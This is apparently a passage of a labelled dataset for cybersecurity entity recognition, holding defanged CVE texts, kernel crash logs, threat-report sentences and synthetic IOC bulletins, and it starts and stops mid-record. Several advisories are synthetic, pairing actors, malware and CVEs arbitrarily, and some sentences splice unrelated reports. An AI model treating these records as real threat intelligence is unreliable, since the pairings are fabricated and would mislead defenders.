]org 04/01/2014\nCall Trace:\n \n dump_stack_lvl (lib/dump_stack.c:117)\n should_fail_ex (lib/fault-inject.c:52 lib/fault-inject.c:153)\n should_failslab (mm/slub.c:3733)\n kmalloc_trace (mm/slub.c:3748 mm/slub.c:3827 mm/slub.c:3992)\n inet6_dump_fib (./include/linux/slab.h:628 ./include/linux/slab.h:749 net/ipv6/ip6_fib.c:662)\n rtnl_dump_all (net/core/rtnetlink.c:4029)\n netlink_dump (net/netlink/af_netlink.c:2269)\n netlink_recvmsg (net/netlink/af_netlink.c:1988)\n ____sys_recvmsg (net/socket.c:1046 net/socket.c:2801)\n ___sys_recvmsg (net/socket.c:2846)\n do_recvmmsg (net/socket.c:2943)\n __x64_sys_recvmmsg (net/socket.c:3041 net/socket.c:3034 net/socket.c:3034)\n\n[1]:\nBUG: TASK stack guard page was hit at 00000000f2fa9af1 (stack is 00000000b7912430..000000009a436beb)\nstack guard page: 0000 [#1] PREEMPT SMP KASAN\nCPU: 1 PID: 223719 Comm: kworker/1:3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]0-0-gd239552ce722-prebuilt[ . ]qemu[ . 
]org 04/01/2014\nWorkqueue: events netlink_sock_destruct_work\nRIP: 0010:fib6_dump_done (net/ipv6/ip6_fib.c:570)\nCode: 3c 24 e8 f3 e9 51 fd e9 28 fd ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 41 57 41 56 41 55 41 54 55 48 89 fd <53> 48 8d 5d 60 e8 b6 4d 07 fd 48 89 da 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d980000 EFLAGS: 00010293\nRAX: 0000000000000000 RBX: ffffffff84405990 RCX: ffffffff844059d3\nRDX: ffff8881028e0000 RSI: ffffffff84405ac2 RDI: ffff88810c02f358\nRBP: ffff88810c02f358 R08: 0000000000000007 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000224 R12: 0000000000000000\nR13: ffff888007c82c78 R14: ffff888007c82c68 R15: ffff888007c82c68\nFS: 0000000000000000(0000) GS:ffff88811b100000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffffc9000d97fff8 CR3: 0000000102309002 CR4: 0000000000770ef0\nPKRU: 55555554\nCall Trace:\n <#DF>\n \n \n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n ...\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n netlink_sock_destruct (net/netlink/af_netlink.c:401)\n __sk_destruct (net/core/sock.c:2177 (discriminator 2))\n sk_destruct (net/core/sock.c:2224)\n __sk_free (net/core/sock.c:2235)\n sk_free (net/core/sock.c:2246)\n process_one_work (kernel/workqueue.c:3259)\n worker_thread (kernel/workqueue.c:3329 kernel/workqueue.\n---truncated---", "spans": {"Indicator: rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org": [[1455, 1515], [2476, 2536]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1410, 1414], [2431, 2435]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35886"}} {"text": "We identified an overlap in the domain voguextra[.]com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", 
"spans": {"Malware: Devoted To Humanity": [[98, 117]], "Indicator: voguextra.com": [[39, 54]]}, "info": {"id": "dnrti_train_001710", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-30673 is a critical CSRF vulnerability affecting Atlassian Confluence. Palo Alto Unit 42 confirmed active exploitation by Turla in the wild. Exploitation delivers IcedID (SHA1: a54849f46f2a2cd2cbeaa8926bd479a1d316da5f) which is dropped to C:\\Users\\Public\\Documents\\dropper.ps1. The exploit payload is hosted at hxxp://login-proxy[ . ]info/collect and communicates to 125 [ . ] 233 [ . ] 148 [ . ] 181 for C2.", "spans": {"Vulnerability: CVE-2024-30673": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Atlassian Confluence": [[82, 102]], "Organization: Palo Alto Unit 42": [[104, 121]], "Malware: IcedID": [[196, 202]], "Indicator: a54849f46f2a2cd2cbeaa8926bd479a1d316da5f": [[210, 250]], "Indicator: http://login-proxy.info/collect": [[344, 379]], "Indicator: 125.233.148.181": [[400, 433]]}, "info": {"id": "synth_v2_00778", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix wild-memory-access in register_synth_event()\n\nIn register_synth_event(), if set_synth_event_print_fmt() failed, then\nboth trace_remove_event_call() and unregister_trace_event() will be\ncalled, which means the trace_event_call will call\n__unregister_trace_event() twice. 
As the result, the second unregister\nwill causes the wild-memory-access.\n\nregister_synth_event\n set_synth_event_print_fmt failed\n trace_remove_event_call\n event_remove\n if call->event.funcs then\n __unregister_trace_event (first call)\n unregister_trace_event\n __unregister_trace_event (second call)\n\nFix the bug by avoiding to call the second __unregister_trace_event() by\nchecking if the first one is called.\n\ngeneral protection fault, probably for non-canonical address\n\t0xfbd59c0000000024: 0000 [#1] SMP KASAN PTI\nKASAN: maybe wild-memory-access in range\n[0xdead000000000120-0xdead000000000127]\nCPU: 0 PID: 3807 Comm: modprobe Not tainted\n6.1.0-rc1-00186-g76f33a7eedb4 #299\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[ . ]15[ . ]0-0-g2dd4b9b3f840-prebuilt[ . ]qemu[ . ]org 04/01/2014\nRIP: 0010:unregister_trace_event+0x6e/0x280\nCode: 00 fc ff df 4c 89 ea 48 c1 ea 03 80 3c 02 00 0f 85 0e 02 00 00 48\nb8 00 00 00 00 00 fc ff df 4c 8b 63 08 4c 89 e2 48 c1 ea 03 <80> 3c 02\n00 0f 85 e2 01 00 00 49 89 2c 24 48 85 ed 74 28 e8 7a 9b\nRSP: 0018:ffff88810413f370 EFLAGS: 00010a06\nRAX: dffffc0000000000 RBX: ffff888105d050b0 RCX: 0000000000000000\nRDX: 1bd5a00000000024 RSI: ffff888119e276e0 RDI: ffffffff835a8b20\nRBP: dead000000000100 R08: 0000000000000000 R09: fffffbfff0913481\nR10: ffffffff8489a407 R11: fffffbfff0913480 R12: dead000000000122\nR13: ffff888105d050b8 R14: 0000000000000000 R15: ffff888105d05028\nFS: 00007f7823e8d540(0000) GS:ffff888119e00000(0000)\nknlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f7823e7ebec CR3: 000000010a058002 CR4: 0000000000330ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \n __create_synth_event+0x1e37/0x1eb0\n create_or_delete_synth_event+0x110/0x250\n synth_event_run_command+0x2f/0x110\n test_gen_synth_cmd+0x170/0x2eb [synth_event_gen_test]\n 
synth_event_gen_test_init+0x76/0x9bc [synth_event_gen_test]\n do_one_initcall+0xdb/0x480\n do_init_module+0x1cf/0x680\n load_module+0x6a50/0x70a0\n __do_sys_finit_module+0x12f/0x1c0\n do_syscall_64+0x3f/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd", "spans": {"Indicator: rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org": [[1133, 1193]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1088, 1092]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-49799"}} {"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst[ . ]exe” utility to register a custom shim database file containing a patch onto a system .", "spans": {"Organization: Dragos": [[0, 6]], "Organization: oil": [[186, 189]], "Organization: gas industries": [[194, 208]], "Malware: PowerShell script": [[311, 328]], "Indicator: sdbinst.exe”": [[345, 361]]}, "info": {"id": "cyberner_stix_train_000413", "source": "defanged_augment"}} {"text": "] it Firenze server2mi.exodus.connexxa [ . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks . URL : hxxp://nicoledotson[.]icu/debby/weatherford/Ekspertyza . Once they successfully breached a network , MuddyWater attempted to steal credentials and move laterally .", "spans": {"Organization: Dragos": [[43, 49]], "Indicator: http://nicoledotson.icu/debby/weatherford/Ekspertyza": [[290, 344]]}, "info": {"id": "cyberner_stix_train_002430", "source": "defanged_augment"}} {"text": "IOC Bulletin - AgentTesla Campaign:\nNetwork Indicators:\n- 45 [ . ] 203 [ . ] 126 [ . 
] 98\n- 218[.]118[.]255[.]116\n- 172[.]13[.]101[.]75\n- storagesync[.]tech\n- gatewaygateway[.]com\nURLs:\n- hxxp://api-api[ . ]cc/admin/config\n- hxxp://login-proxy[ . ]link/wp-content/uploads/doc.php\nEmail Senders:\n- account@identity-verify[.]cc\n- notification@credential-check[ . ]site\nFile Indicators:\n- SHA256: 61e1ff2aeb28548fde8a079bc97f5483dd9243103ca7addb478bdf795801c94e\n- SHA256: 6b95cf9e398686c1bca42fd67e6e77fb07e704bb1d0947f54381bc5b1db628d4\n- Drop path: /usr/local/bin/payload.bin", "spans": {"Malware: AgentTesla": [[15, 25]], "Indicator: 45.203.126.98": [[58, 89]], "Indicator: 218.118.255.116": [[92, 113]], "Indicator: 172.13.101.75": [[116, 135]], "Indicator: storagesync.tech": [[138, 156]], "Indicator: gatewaygateway.com": [[159, 179]], "Indicator: http://api-api.cc/admin/config": [[188, 222]], "Indicator: hxxp://login-proxy.link/wp-content/uploads/doc.php": [[225, 279]], "Indicator: account@identity-verify.cc": [[297, 325]], "Indicator: notification@credential-check.site": [[328, 366]], "Indicator: 61e1ff2aeb28548fde8a079bc97f5483dd9243103ca7addb478bdf795801c94e": [[394, 458]], "Indicator: 6b95cf9e398686c1bca42fd67e6e77fb07e704bb1d0947f54381bc5b1db628d4": [[469, 533]]}, "info": {"id": "synth_v2_01306", "source": "defanged_augment"}} {"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit[ . ]MSWord[ . ]CVE-2010-333 , Exploit[ . ]Win32[ . 
]CVE-2012-0158 .", "spans": {"Organization: IT service": [[70, 80]], "Organization: (MSPs)": [[91, 97]], "Organization: Kaspersky Lab": [[177, 190]], "Organization: Microsoft Office": [[214, 230]], "Vulnerability: exploits": [[231, 239]], "Indicator: Exploit.MSWord.CVE-2010-333": [[287, 322]], "Indicator: Exploit.Win32.CVE-2012-0158": [[325, 360]]}, "info": {"id": "cyberner_stix_train_002989", "source": "defanged_augment"}} {"text": "IOC Bulletin - Lumma Stealer Campaign:\nNetwork Indicators:\n- 172 [ . ] 240 [ . ] 215 [ . ] 150\n- 10 [ . ] 104 [ . ] 252 [ . ] 248\n- 155 [ . ] 126 [ . ] 1 [ . ] 24\n- secure-update[ . ]net\n- cloudauth[.]io\nURLs:\n- hxxps://update-login[ . ]xyz/secure/token\n- hxxp://cloud-api[.]dev/wp-content/uploads/doc.php\nEmail Senders:\n- service@login-portal[ . ]tech\n- info@mail-service[.]info\nFile Indicators:\n- MD5: 40e0d120d6e188c5c0d9ea83a23b5e6a\n- SHA256: 2c9d196410573193e1d369fc6ed96f2b9fcc512066a63ffac0e293df05becce1\n- Drop path: C:\\Windows\\Temp\\shell.php", "spans": {"Malware: Lumma Stealer": [[15, 28]], "Indicator: 172.240.215.150": [[61, 94]], "Indicator: 10.104.252.248": [[97, 129]], "Indicator: 155.126.1.24": [[132, 162]], "Indicator: secure-update.net": [[165, 186]], "Indicator: cloudauth.io": [[189, 203]], "Indicator: hxxps://update-login.xyz/secure/token": [[212, 253]], "Indicator: hxxp://cloud-api.dev/wp-content/uploads/doc.php": [[256, 305]], "Indicator: service@login-portal.tech": [[323, 352]], "Indicator: info@mail-service.info": [[355, 379]], "Indicator: 40e0d120d6e188c5c0d9ea83a23b5e6a": [[404, 436]], "Indicator: 2c9d196410573193e1d369fc6ed96f2b9fcc512066a63ffac0e293df05becce1": [[447, 511]]}, "info": {"id": "synth_v2_01435", "source": "defanged_augment"}} {"text": "A vulnerability was found in FreePBX cdr 14.0. It has been classified as critical. This affects the function ajaxHandler of the file ucp/Cdr.class.php. The manipulation of the argument limit/offset leads to sql injection. 
Upgrading to version 14[.]0[.]5[.]21 is able to address this issue. The name of the patch is f1a9eea2dfff30fb99d825bac194a676a82b9ec8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216771.", "spans": {"Indicator: 14.0.5.21": [[243, 258]], "Indicator: f1a9eea2dfff30fb99d825bac194a676a82b9ec8": [[315, 355]], "Vulnerability: sql injection": [[207, 220]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-36630"}} {"text": "com.schwab.mobile com[ . ]americanexpress[ . ]android[ . ]acctsvcs[ . ]us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661", "spans": {"Indicator: com.americanexpress.android.acctsvcs.us": [[18, 73]]}, "info": {"id": "cyner_train_001055", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-45005 is a critical race condition affecting Citrix NetScaler. CrowdStrike confirmed active exploitation by Star Blizzard in the wild. Exploitation delivers DanaBot (SHA1: 8694a04b8d7eaf0d405abd673d69d9878663e9cd) which is dropped to /etc/cron.d/payload.bin. The exploit payload is hosted at hxxp://apiupdate[ . ]link/assets/js/payload.js and communicates to 192 [ . ] 187 [ . ] 179 [ . 
] 185 for C2.", "spans": {"Vulnerability: CVE-2023-45005": [[24, 38]], "Vulnerability: race condition": [[53, 67]], "System: Citrix NetScaler": [[78, 94]], "Organization: CrowdStrike": [[96, 107]], "Malware: DanaBot": [[190, 197]], "Indicator: 8694a04b8d7eaf0d405abd673d69d9878663e9cd": [[205, 245]], "Indicator: hxxp://apiupdate.link/assets/js/payload.js": [[325, 371]], "Indicator: 192.187.179.185": [[392, 425]]}, "info": {"id": "synth_v2_00721", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 201 [ . ] 49 [ . ] 34, the Qualys IR team identified Gootloader running as /tmp/runtime.dll. The threat actor, believed to be TA505, used WinPEAS for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to cache-login[ . ]online and backuplogin[.]xyz. The initial dropper (SHA1: 0af9b1abe80840147ff14976086c1212b741c87d) was delivered via a phishing email from notification@secure-verify[ . ]net. A second C2 node was observed at 193 [ . ] 27 [ . ] 155 [ . 
] 118, with a persistence mechanism writing to C:\\Windows\\Temp\\csrss.exe.", "spans": {"Indicator: 192.201.49.34": [[64, 95]], "Organization: Qualys": [[101, 107]], "Malware: Gootloader": [[127, 137]], "Indicator: cache-login.online": [[308, 330]], "Indicator: backuplogin.xyz": [[335, 352]], "Indicator: 0af9b1abe80840147ff14976086c1212b741c87d": [[381, 421]], "Indicator: notification@secure-verify.net": [[463, 497]], "Indicator: 193.27.155.118": [[532, 564]]}, "info": {"id": "synth_v2_00335", "source": "defanged_augment"}} {"text": "Artifact Analysis for TrickBot campaign:\nStage 1 dropper at /etc/cron.d/chrome_helper.exe - SHA1: b5beb5635baa396e227fd79331fd3442ad70105b\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\implant.so - SHA1: 281eaefeabb72cf07ab45c7c6af14e11c6e31fd5\nFinal payload at C:\\ProgramData\\update.dll - SHA256: 0a54faf272ad58bf7b7ace7a3b8de248c3a3bfb75c715bbced6b4520a4ba0f0a\nExfiltration module - SHA256: 24df310619e615c0b8148ee3070511cdce287633d9ce73863bf64fa608d2fe7b\nAll stages communicated with 76 [ . ] 113 [ . ] 7 [ . ] 10. Sharphound signatures detected in Stage 2.", "spans": {"Malware: TrickBot": [[22, 30]], "Indicator: b5beb5635baa396e227fd79331fd3442ad70105b": [[98, 138]], "Indicator: 281eaefeabb72cf07ab45c7c6af14e11c6e31fd5": [[210, 250]], "Indicator: 0a54faf272ad58bf7b7ace7a3b8de248c3a3bfb75c715bbced6b4520a4ba0f0a": [[304, 368]], "Indicator: 24df310619e615c0b8148ee3070511cdce287633d9ce73863bf64fa608d2fe7b": [[399, 463]], "Indicator: 76.113.7.10": [[493, 522]]}, "info": {"id": "synth_v2_01985", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-20659 is a critical SSRF vulnerability affecting Cisco ASA. Dragos confirmed active exploitation by FIN11 in the wild. Exploitation delivers Vidar (SHA256: 106cb5dfcca5dac7fe2ab9d0d9db6ecdc3d9bfa6d56f008104f6f88bf7370f9d) which is dropped to C:\\Program Files\\Common Files\\ntds.dit. 
The exploit payload is hosted at hxxps://login-proxy[.]com/login and communicates to 10[.]180[.]32[.]135 for C2.", "spans": {"Vulnerability: CVE-2023-20659": [[24, 38]], "Vulnerability: SSRF vulnerability": [[53, 71]], "System: Cisco ASA": [[82, 91]], "Organization: Dragos": [[93, 99]], "Malware: Vidar": [[174, 179]], "Indicator: 106cb5dfcca5dac7fe2ab9d0d9db6ecdc3d9bfa6d56f008104f6f88bf7370f9d": [[189, 253]], "Indicator: hxxps://login-proxy.com/login": [[348, 379]], "Indicator: 10.180.32.135": [[400, 419]]}, "info": {"id": "synth_v2_00731", "source": "defanged_augment"}} {"text": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3 [ . ] 2 [ . ] 18 [ . ] 2, D6220 before 1 [ . ] 0 [ . ] 0 [ . ] 68, D6400 before 1 [ . ] 0 [ . ] 0 [ . ] 102, D8500 before 1[.]0[.]3[.]60, LAX20 before 1[.]1[.]6[.]28, MK62 before 1[.]0[.]6[.]116, MR60 before 1 [ . ] 0 [ . ] 6 [ . ] 116, MS60 before 1[.]0[.]6[.]116, R6300v2 before 1 [ . ] 0 [ . ] 4 [ . ] 50, R6400 before 1 [ . ] 0 [ . ] 1 [ . ] 68, R6400v2 before 1 [ . ] 0 [ . ] 4 [ . ] 118, R6700v3 before 1 [ . ] 0 [ . ] 4 [ . ] 118, R6900P before 1 [ . ] 3 [ . ] 3 [ . ] 140, R7000 before 1 [ . ] 0 [ . ] 11 [ . ] 116, R7000P before 1 [ . ] 3 [ . ] 3 [ . ] 140, R7850 before 1 [ . ] 0 [ . ] 5 [ . ] 68, R7900 before 1 [ . ] 0 [ . ] 4 [ . ] 38, R7900P before 1 [ . ] 4 [ . ] 2 [ . ] 84, R7960P before 1[.]4[.]2[.]84, R8000 before 1[.]0[.]4[.]68, R8000P before 1[.]4[.]2[.]84, RAX15 before 1[.]0[.]3[.]96, RAX20 before 1[.]0[.]3[.]96, RAX200 before 1 [ . ] 0 [ . ] 4 [ . ] 120, RAX35v2 before 1[.]0[.]3[.]96, RAX40v2 before 1[.]0[.]3[.]96, RAX43 before 1[.]0[.]3[.]96, RAX45 before 1 [ . ] 0 [ . ] 3 [ . ] 96, RAX50 before 1[.]0[.]3[.]96, RAX75 before 1[.]0[.]4[.]120, RAX80 before 1[.]0[.]4[.]120, RBK752 before 3 [ . ] 2 [ . ] 17 [ . ] 12, RBK852 before 3[.]2[.]17[.]12, RBR750 before 3[.]2[.]17[.]12, RBR850 before 3 [ . ] 2 [ . ] 17 [ . 
] 12, RBS750 before 3[.]2[.]17[.]12, RBS850 before 3[.]2[.]17[.]12, RS400 before 1 [ . ] 5 [ . ] 1 [ . ] 80, and XR1000 before 1[.]0[.]0[.]58.", "spans": {"Indicator: 3.2.18.2": [[123, 149]], "Indicator: 1.0.0.68": [[164, 190]], "Indicator: 1.0.0.102": [[205, 232]], "Indicator: 1.0.3.60": [[247, 261]], "Indicator: 1.1.6.28": [[276, 290]], "Indicator: 1.0.6.116": [[304, 319], [333, 360], [374, 389]], "Indicator: 1.0.4.50": [[406, 432]], "Indicator: 1.0.1.68": [[447, 473]], "Indicator: 1.0.4.118": [[490, 517], [534, 561]], "Indicator: 1.3.3.140": [[577, 604], [663, 690]], "Indicator: 1.0.11.116": [[619, 647]], "Indicator: 1.0.5.68": [[705, 731]], "Indicator: 1.0.4.38": [[746, 772]], "Indicator: 1.4.2.84": [[788, 814], [830, 844], [889, 903]], "Indicator: 1.0.4.68": [[859, 873]], "Indicator: 1.0.3.96": [[918, 932], [947, 961], [1021, 1035], [1052, 1066], [1081, 1095], [1110, 1136], [1151, 1165]], "Indicator: 1.0.4.120": [[977, 1004], [1180, 1195], [1210, 1225]], "Indicator: 3.2.17.12": [[1241, 1268], [1284, 1299], [1315, 1330], [1346, 1373], [1389, 1404], [1420, 1435]], "Indicator: 1.5.1.80": [[1450, 1476]], "Indicator: 1.0.0.58": [[1496, 1510]], "Vulnerability: stack-based buffer overflow": [[42, 69]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-45604"}} {"text": "DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Affected versions are subject to a privilege escalation vulnerability. A DHIS2 user with authority to manage users can assign superuser privileges to themself by manually crafting an HTTP PUT request. Only users with the following DHIS2 user role authorities can exploit this vulnerability. Note that in many systems the only users with user admin privileges are also superusers. In these cases, the escalation vulnerability does not exist. The vulnerability is only exploitable by attackers who can authenticate as users with the user admin authority. 
As this is usually a small and relatively trusted set of users, exploit vectors will often be limited. DHIS2 administrators should upgrade to the following hotfix releases: 2[.]36[.]12[.]1, 2 [ . ] 37 [ . ] 8 [ . ] 1, 2 [ . ] 38 [ . ] 2 [ . ] 1, 2[.]39[.]0[.]1. The only known workaround to this issue is to avoid the assignment of the user management authority to any users until the patch has been applied.", "spans": {"Indicator: 2.36.12.1": [[842, 857]], "Indicator: 2.37.8.1": [[859, 885]], "Indicator: 2.38.2.1": [[887, 913]], "Indicator: 2.39.0.1": [[915, 929]], "Vulnerability: privilege escalation": [[150, 170]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-41948"}} {"text": "A backdoor also known as: W32.OnGamesGNOLAH.Trojan Worm.Win32.VB!O Trojan.Jinra.A3 Worm.VB.Win32.2511 W32/VB.bem Win32[.]Worm[.]VB[.]kz W32.SillyFDC Win32/SillyAutorun.CKX WORM_VB.JSE Worm.Win32.VB.bem Trojan.Win32.VB.csfhed W32.W.VB.tnRc Win32.Worm.Vb.Szvd WORM_VB.JSE Worm/VB.pbz Worm/Win32.VB Worm:Win32/Jinra.A Trojan.Symmi.D5113 Worm.Win32.A.VB.184320 Worm.Win32.VB.bem Worm/Win32.VB.R125768 Trojan.VBRA.010736 Worm.Email Win32/VB.NUR Worm.VB!cXQoycDN5vU Worm.Win32.AutoRun", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Win32.Worm.VB.kz": [[113, 135]]}, "info": {"id": "cyner2_train_003964", "source": "defanged_augment"}} {"text": "This mimics the wallet updater connected to the C2 addresses : wfcwallet[ . ]com ( resolved ip : 108 [ . ] 174 [ . ] 195 [ . ] 134 ) , www[.]chainfun365[.]com ( resolved ip : 23[.]254[.]217[.]53 ) .", "spans": {"Indicator: wfcwallet.com": [[63, 80]], "Indicator: 108.174.195.134": [[97, 130]], "Indicator: www.chainfun365.com": [[135, 158]], "Indicator: 23.254.217.53": [[175, 194]]}, "info": {"id": "cyberner_stix_train_007089", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: NSA identified a large-scale phishing operation. 
Emails originated from finance@document-share[.]link and notification@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxps://gateway-backup[.]com/callback which hosted a credential harvesting page on datasync[ . ]io. A secondary link hxxp://portal-static[ . ]club/wp-content/uploads/doc.php delivered SystemBC (MD5: b767b2e84d8ece2f6d0342b75ed0e898). The malware was saved to /usr/local/bin/sam.hive and established C2 with 192 [ . ] 80 [ . ] 60 [ . ] 58.", "spans": {"Organization: NSA": [[26, 29]], "Indicator: finance@document-share.link": [[98, 127]], "Indicator: notification@account-update.xyz": [[132, 165]], "Indicator: hxxps://gateway-backup.com/callback": [[222, 259]], "Indicator: datasync.io": [[305, 320]], "Indicator: hxxp://portal-static.club/wp-content/uploads/doc.php": [[339, 395]], "Malware: SystemBC": [[406, 414]], "Indicator: b767b2e84d8ece2f6d0342b75ed0e898": [[421, 453]], "Indicator: 192.80.60.58": [[529, 559]]}, "info": {"id": "synth_v2_00911", "source": "defanged_augment"}} {"text": "The command then uses the certutil application to convert the base64 encoded data ( T1132 ) in the cmd[ . ]txt file to c[ . ]aspx in three different SharePoint related folders .", "spans": {"Indicator: cmd.txt": [[99, 110]], "Indicator: c.aspx": [[119, 129]]}, "info": {"id": "cyberner_stix_train_005023", "source": "defanged_augment"}} {"text": "Allows the extraction filter to be ignored, allowing symlink targets to point outside the destination directory, and the modification of some file metadata.\n\n\nYou are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of \"data\" or \"tar\". See the tarfile extraction filters documentation hxxps://docs[ . ]python[ . 
]org/3/library/tarfile.html#tarfile-extraction-filter  for more information.\n\nNote that for Python 3.14 or later the default value of filter= changed from \"no filtering\" to `\"data\", so if you are relying on this new default behavior then your usage is also affected.\n\nNote that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.", "spans": {"Indicator: https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter": [[419, 499]], "System: Python": [[538, 544]], "Vulnerability: code execution": [[887, 901]], "Vulnerability: symlink": [[53, 60]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-4138"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Correct the migration DMA map direction\n\nThe SVM DMA device map direction should be set the same as\nthe DMA unmap setting, otherwise the DMA core will report\nthe following warning.\n\nBefore finialize this solution, there're some discussion on\nthe DMA mapping type(stream-based or coherent) in this KFD\nmigration case, followed by hxxps://lore[.]kernel[.]org/all/04d4ab32\n-45a1-4b88-86ee-fb0f35a0ca40@amd[.]com/T/.\n\nAs there's no dma_sync_single_for_*() in the DMA buffer accessed\nthat because this migration operation should be sync properly and\nautomatically. Give that there's might not be a performance problem\nin various cache sync policy of DMA sync. 
Therefore, in order to\nsimplify the DMA direction setting alignment, let's set the DMA map\ndirection as BIDIRECTIONAL.\n\n[ 150.834218] WARNING: CPU: 8 PID: 1812 at kernel/dma/debug.c:1028 check_unmap+0x1cc/0x930\n[ 150.834225] Modules linked in: amdgpu(OE) amdxcp drm_exec(OE) gpu_sched drm_buddy(OE) drm_ttm_helper(OE) ttm(OE) drm_suballoc_helper(OE) drm_display_helper(OE) drm_kms_helper(OE) i2c_algo_bit rpcsec_gss_krb5 auth_rpcgss nfsv4 nfs lockd grace netfs xt_conntrack xt_MASQUERADE nf_conntrack_netlink xfrm_user xfrm_algo iptable_nat xt_addrtype iptable_filter br_netfilter nvme_fabrics overlay nfnetlink_cttimeout nfnetlink openvswitch nsh nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c bridge stp llc sch_fq_codel intel_rapl_msr amd_atl intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_scodec_component snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg edac_mce_amd snd_pci_acp6x snd_hda_codec snd_acp_config snd_hda_core snd_hwdep snd_soc_acpi kvm_amd sunrpc snd_pcm kvm binfmt_misc snd_seq_midi crct10dif_pclmul snd_seq_midi_event ghash_clmulni_intel sha512_ssse3 snd_rawmidi nls_iso8859_1 sha256_ssse3 sha1_ssse3 snd_seq aesni_intel snd_seq_device crypto_simd snd_timer cryptd input_leds\n[ 150.834310] wmi_bmof serio_raw k10temp rapl snd sp5100_tco ipmi_devintf soundcore ccp ipmi_msghandler cm32181 industrialio mac_hid msr parport_pc ppdev lp parport efi_pstore drm(OE) ip_tables x_tables pci_stub crc32_pclmul nvme ahci libahci i2c_piix4 r8169 nvme_core i2c_designware_pci realtek i2c_ccgx_ucsi video wmi hid_generic cdc_ether usbnet usbhid hid r8152 mii\n[ 150.834354] CPU: 8 PID: 1812 Comm: rocrtst64 Tainted: G OE 6.10.0-custom #492\n[ 150.834358] Hardware name: AMD Majolica-RN/Majolica-RN, BIOS RMJ1009A 06/13/2021\n[ 150.834360] RIP: 0010:check_unmap+0x1cc/0x930\n[ 150.834363] Code: c0 4c 89 4d c8 e8 34 bf 86 00 4c 8b 4d c8 4c 8b 45 c0 48 8b 4d b8 48 89 c6 41 57 4c 89 ea 48 c7 c7 80 49 b4 84 e8 b4 81 f3 ff <0f> 0b 48 c7 
